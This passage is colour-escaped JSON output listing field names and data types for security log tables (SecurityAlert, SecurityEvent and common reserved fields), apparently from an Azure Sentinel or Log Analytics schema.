\u001b[94m\"UnHealthyHostCount_d\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"UserAgent_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VnetResourceGuid_s\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"ReservedCommonFields\"\u001b[39;49;00m: {\n        \u001b[94m\"CallerIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Category\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CorrelationId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DurationMs\"\u001b[39;49;00m: \u001b[33m\"long\"\u001b[39;49;00m,\n        \u001b[94m\"IPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Message\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Resource\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultSignature\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResultType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Severity\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"SourceIP\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityAlert\"\u001b[39;49;00m: {\n        \u001b[94m\"AlertName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AlertSeverity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceLevel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ConfidenceScore\"\u001b[39;49;00m: \u001b[33m\"real\"\u001b[39;49;00m,\n        \u001b[94m\"Description\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Entities\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedLinks\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IsIncident\"\u001b[39;49;00m: \u001b[33m\"bool\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessingEndTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"ProductComponentName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProductName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProviderName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemediationSteps\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ResourceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StartTime\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"SystemAlertId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorOriginalId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceResourceGroup\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"WorkspaceSubscriptionId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m\n    },\n    \u001b[94m\"SecurityEvent\"\u001b[39;49;00m: {\n        \u001b[94m\"AccessMask\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Account\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountDomain\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountExpires\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AccountType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Activity\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AdditionalInfo2\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AllowedToDelegateTo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Attributes\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditPolicyChanges\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuditsDiscarded\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationLevel\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationProvider\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationService\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"AuthenticationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"AzureDeploymentID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CACertificateHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CAPublicKeyHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CalledStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallerProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CallingStationID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CertificateDatabaseHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Channel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClassId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClassName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientIPAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ClientName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CommandLine\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"CompatibleIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Computer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DCDNSName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceDescription\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DeviceId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DisplayName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Disposition\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainBehaviorVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainPolicyChanged\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"DomainSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EAPType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ElevatedToken\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ErrorCode\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventData\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"EventID\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"EventSourceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ExtendedQuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FailureReason\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FileHash\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FilePathNoUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Filter\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ForceLogoff\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Fqbn\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"FullyQualifiedSubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"GroupMembership\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HandleId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HardwareIds\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomeDirectory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"HomePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"InterfaceUuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"IpPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"KeyLength\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"Level\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LmPackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LocationInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutDuration\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutObservationWindow\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LockoutThreshold\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LoggingResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonHours\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"LogonType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"LogonTypeName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineAccountQuota\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineInventory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MachineLogon\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ManagementGroupName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MandatoryLabel\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MaxPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MemberSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordAge\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MinPasswordLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"MixedDomainMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv4Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIPv6Address\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NASPortType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NetworkPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"NewValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectServer\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ObjectValueName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OemInformation\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldMaxUsers\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldRemark\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldShareFlags\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldUacValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValue\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OldValueType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"OperationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PackageName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ParentProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordHistoryLength\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordLastSet\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PasswordProperties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousDate\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PreviousTime\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrimaryGroupId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivateKeyUsageCount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"PrivilegeList\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Process\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProcessName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProfilePath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Properties\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProtocolSequence\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ProxyPolicyName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineHelpURL\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSessionIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineState\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"QuarantineSystemHealthResult\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RelativeTargetName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemoteIpAddress\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RemotePort\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RequestId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Requester\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RestrictedAdminMode\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"RowsDeleted\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SamAccountName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ScriptPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SecurityDescriptor\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceFileName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceStartType\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"ServiceType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SessionName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareLocalPath\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"ShareName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SidHistory\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceComputerId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SourceSystem\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Status\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"StorageAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubStatus\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubcategoryId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Subject\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectKeyIdentifier\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectMachineSID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"SubjectUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TableId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetAccount\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetInfo\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLinkedLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonGuid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetLogonId\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundDomainName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetOutboundUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetServerName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUser\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TargetUserSid\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Task\"\u001b[39;49;00m: \u001b[33m\"int\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateContent\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateDSObjectFQDN\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateInternalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateOID\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateSchemaVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TemplateVersion\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TimeGenerated\"\u001b[39;49;00m: \u001b[33m\"datetime\"\u001b[39;49;00m,\n        \u001b[94m\"TokenElevationType\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"TransmittedServices\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"Type\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserAccountControl\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserParameters\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserPrincipalName\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"UserWorkstations\"\u001b[39;49;00m: \u001b[33m\"string\"\u001b[39;49;00m,\n        \u001b[94m\"VendorIds\"\u001b[39;49;00m: 